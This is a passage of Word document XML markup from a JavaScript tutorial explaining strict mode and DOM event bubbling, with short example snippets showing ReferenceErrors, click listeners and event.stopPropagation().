          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Deleting a property that cannot be deleted (like a variable or function declared with var) will throw an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EC841D" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Enabling Strict Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79951B82" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Strict mode can be enabled at the script level or within individual functions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684D4C4D" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="235"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Global Strict Mode</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78750C66" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="235"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>To apply strict mode to an entire script, place "use strict"; at the top of the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D698A82" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23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22E00149"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"use strict";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069E1142"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908CC3E"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x = 10; // ReferenceError: x is not defined</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61905A5C" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="235"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Function-Level Strict Mode</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E774BA" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="235"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>You can also apply strict mode only to a specific function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7606B2" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23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07CD0A29"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myFunction() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600B7D24"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 strict";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CCBB66"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y = 20; // ReferenceError: y is not defined</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503E126B"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8556EF4"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p>
    <w:p w14:paraId="008E8FEA"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myFunction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7833AE7D"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Example of Strict Mode in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B1C4DA"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"use strict";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D99DB0"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C832F25"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strictFunction() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB47FD9"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This will throw a ReferenceError in strict mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9986C5"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undeclaredVar = "This will cause an error";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED3EC5C"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31F797D"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98471BF" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B"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strictFunction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190C9537" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this example, because strict mode is enabled, trying to assign a value to undeclaredVar without declaring it first will cause a ReferenceError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C52DE2" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Benefits of Using Strict Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317DF4D8" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="236"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Helps Avoid Common Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4826CFB8" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="236"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>By catching mistakes like accidental global variable creation, strict mode helps reduce bugs in your code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FBAA1A" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="236"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Improves Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B95C45" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="236"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Some JavaScript engines optimize code better when strict mode is enabled, since it limits the features of the language that need to be supported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A159F14" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="236"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Enhances Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A849E33" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="236"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>By disallowing certain unsafe actions, strict mode can help prevent some common security issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB605DB" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When to Use Strict Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D2FEAF" w14:textId="3BC84C54" w:rsidR="005A3D24" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Strict mode is especially useful in large projects or when working in a team, as it enforces a stricter, more predictable coding style. It’s also good practice to use strict mode in modern JavaScript development to avoid potential pitfalls and write more reliable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B6460B" w14:textId="714718B4" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc178383255"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is event bubbling</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="63C65B94" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What Is Event Bubbling?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB41B40" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event bubbling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a process in which an event that occurs on an element in the DOM triggers not only the event listener on that element but also all the event listeners on its parent elements, moving up the DOM tree. The event starts from the target element (where the event occurs) and "bubbles" up to the root of the document, triggering handlers along the way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578641F6" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example of Event Bubbling in the Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2747491F"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&lt;div id="parent"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CCEAB2"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&lt;button id="child"&gt;Click me&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7454B6F5"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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FBBE6D"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4C54B52"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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE735AC"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document.getElementById('parent').addEventListener('click', function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0402D9C2"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console.log('Parent clicked');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C68ABE2"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696F715"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891D5BD"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document.getElementById('child').addEventListener('click', function(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC1B032"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console.log('Child clicked');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A911D71"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C23697F"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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4592E0C3" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When you click the button element, the following occurs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC57873" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The click event is first captured and handled by the child element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AAA4EC" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The event then "bubbles" up to the parent element, triggering the parent element's event listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7585E712" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The output would be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCBB83E" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC"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Child clicked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1167E7C3" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC"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Parent clicked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A32D105" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stopping Event Bubbling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A899AF5" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In some cases, you might want to stop the event from bubbling up to parent elements. This can be done using event.stopPropagation() in the event handler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365103D5"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document.getElementById('child').addEventListener('click', function(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0CD2DA"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event.stopPropagation(); // Prevents the event from bubbling up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5001E091"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console.log('Child clicked');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7310FFAD"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E2D8A5A" w14:textId="77777777" w:rsidR="00BC73BC" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC73BC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
